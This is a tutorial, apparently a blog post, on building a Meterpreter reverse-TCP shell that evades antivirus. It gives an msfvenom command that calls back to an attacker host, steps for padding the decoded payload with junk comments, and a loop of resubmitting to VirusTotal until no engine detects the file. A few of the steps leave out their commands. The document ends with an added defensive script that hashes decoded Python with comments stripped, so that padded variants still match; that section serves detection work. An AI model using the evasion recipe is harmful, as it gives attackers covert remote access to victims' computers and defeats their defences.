AV companies are in a daily battle with cybercriminals and hackers; these threat actors will try every possible method to reach their goal. In this tutorial, I am going to show you how it is possible to create a Meterpreter VNC shell that is not detected by any of the antivirus engines listed on VirusTotal.com.
To be able to participate in this tutorial, you will have to have installed:
- Kali Linux
Start up your Kali Linux operating system and update it to the latest version with the commands ‘sudo apt-get update’ and ‘sudo apt-get upgrade’. Now that your Kali Linux environment is up to date, we are going to create a folder on the desktop named malware_cwz.
You can do this with the following command in your terminal:
Once the directory has been created, navigate into it:
Now the fun starts: we are going to craft the Meterpreter payload with msfvenom:
msfvenom -p python/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=1337 R > encoded.py
Next we decode the encoded shell. Open ‘encoded.py’ and copy the value that sits between the first ‘ and the next ‘; it will look like a string of random characters.
echo RANDOMVALUE | base64 --decode >> decoded.py
Now that the value has been decoded, we are going to edit the decoded.py file.
Type the following in your terminal:
Now we are going to add random text to each line in the file; make sure each addition starts with the # character, so Python treats it as a comment and the code itself does not change.
lineofcode #randomtext
lineofcode #randomtext
lineofcode
Now we have to encode it again with the same tool, ‘base64’, and paste the encoded string into the spot in ‘encoded.py’ where the original value was.
Now that encoded.py is fully armed, we can build an executable from it:
The resulting file is stored in /root/dist/nameofyourfile/.
Upload your file to virustotal.com and repeat the process until no AV engine detects it.
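Seen from the defender's side, the step that turns a known payload into an "unknown" file is the comment padding: every rebuild changes the bytes, and therefore the file hash that signature and reputation lookups key on, while the tokens Python actually executes stay identical. The script below is an added example, not code from the original post. It locates a base64 literal in a wrapper script, decodes it, and hashes the decoded body over its token stream with comments removed, so the padded and unpadded versions of the same script hash to the same value even though their raw hashes differ. The two sample bodies are constructed, harmless stand-ins for the decoded file, and the 40-character minimum length for a candidate base64 literal is an assumption chosen for the example.

```python
"""Comment-insensitive hashing of base64-wrapped Python scripts.

Added example, not code from the original post. The sample script bodies
below are constructed stand-ins for the decoded file; they do nothing
harmful and exist only to show that comment padding changes the raw hash
while the token stream (what Python actually executes) stays the same.
"""
import base64
import hashlib
import io
import re
import tokenize

# Quoted run of base64 characters long enough to be a wrapped script.
# The 40-character minimum is an assumption chosen for this example.
B64_LITERAL = re.compile(r"['\"]([A-Za-z0-9+/=]{40,})['\"]")


def canonical_tokens(source):
    """Tokenise Python source and drop exactly what comment padding adds:
    COMMENT tokens and the NL tokens produced by comment-only lines.
    A '#' inside a string literal survives, because the tokenizer rather
    than a regex decides what is a comment."""
    kept = []
    for tok in tokenize.generate_tokens(io.StringIO(source).readline):
        if tok.type in (tokenize.COMMENT, tokenize.NL):
            continue
        kept.append((tok.type, tok.string))
    return kept


def normalized_hash(source):
    """SHA-256 over the canonical token stream instead of the raw bytes."""
    digest = hashlib.sha256()
    for ttype, tstring in canonical_tokens(source):
        digest.update(f"{ttype}:{tstring}\0".encode())
    return digest.hexdigest()


def raw_hash(source):
    """Plain SHA-256 of the bytes: the kind of hash comment padding defeats."""
    return hashlib.sha256(source.encode()).hexdigest()


def extract_embedded_python(script_text):
    """Find base64 literals in a script, decode them, and return those that
    decode to UTF-8 text the tokenizer accepts (plausible Python source).
    This is a heuristic: the tokenizer is lenient, so an analyst or a
    second check still has to look at what comes back."""
    found = []
    for match in B64_LITERAL.finditer(script_text):
        try:
            decoded = base64.b64decode(match.group(1), validate=True).decode("utf-8")
            canonical_tokens(decoded)  # raises on text the tokenizer rejects
        except (ValueError, tokenize.TokenError, SyntaxError):
            continue
        found.append(decoded)
    return found


# Constructed stand-in for the decoded body (harmless).
ORIGINAL_BODY = (
    "import socket\n"
    "host = '127.0.0.1'  # loopback only\n"
    "print('hello #not-a-comment', host)\n"
)

# The padding step from the post: a '#' comment of varying length appended
# to every line, which is what makes each rebuild a new, unseen file.
PADDED_BODY = "".join(
    f"{line} #{'x' * (i + 3)}\n" for i, line in enumerate(ORIGINAL_BODY.splitlines())
)


def wrap_in_literal(body):
    """Mimic the layout of encoded.py: the body stored as one base64 literal."""
    encoded = base64.b64encode(body.encode()).decode("ascii")
    return f"blob = '{encoded}'\n"


def compare(original, padded):
    """Report whether each hashing strategy considers the two bodies the same."""
    return {
        "raw_hash_matches": raw_hash(original) == raw_hash(padded),
        "normalized_hash_matches": normalized_hash(original) == normalized_hash(padded),
    }


if __name__ == "__main__":
    padded_file = wrap_in_literal(PADDED_BODY)
    for body in extract_embedded_python(padded_file):
        print("embedded script, raw sha256:       ", raw_hash(body))
        print("embedded script, normalized sha256:", normalized_hash(body))
    print(compare(ORIGINAL_BODY, PADDED_BODY))
```

Running the script shows the raw hashes of the two bodies differ while the normalized hashes agree, which is the property a scanner needs if a single indicator is to survive the rebuild-and-resubmit loop described above. The same idea extends to any wrapper that only changes dead bytes: hash what the interpreter sees, not what the file contains.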